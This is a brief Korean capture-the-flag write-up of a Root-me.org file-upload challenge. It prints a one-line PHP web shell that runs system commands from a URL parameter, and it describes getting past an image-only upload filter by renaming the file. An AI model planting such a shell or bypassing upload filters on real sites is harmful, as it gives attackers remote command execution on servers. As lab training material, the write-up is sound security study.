느낌상 웹쉘을 올려야 하는 문제인 것 같다.
NB : only GIF, JPEG or PNG are accepted
다음과 같은 필터링이 있기 때문에,
다음과 같이 이름을 수정해서 올려주면 된다.
<?php
system($_GET['cmd']);
?>찾으라는 문구가 있을줄 알았는데 바로 패스워드가 있다.
Clear!
'WriteUp > Root-me.org' 카테고리의 다른 글
| [Root-me] : Logs analysis - web attack (0) | 2021.01.27 |
|---|---|
| JSON Web Token (JWT) - Weak secret (0) | 2021.01.02 |
| Root me : Directory traversal (0) | 2020.12.28 |
| Rootme : Insecure Code Management (0) | 2020.12.28 |
| Root-me : JSON Web Token (JWT) - Introduction (0) | 2020.12.28 |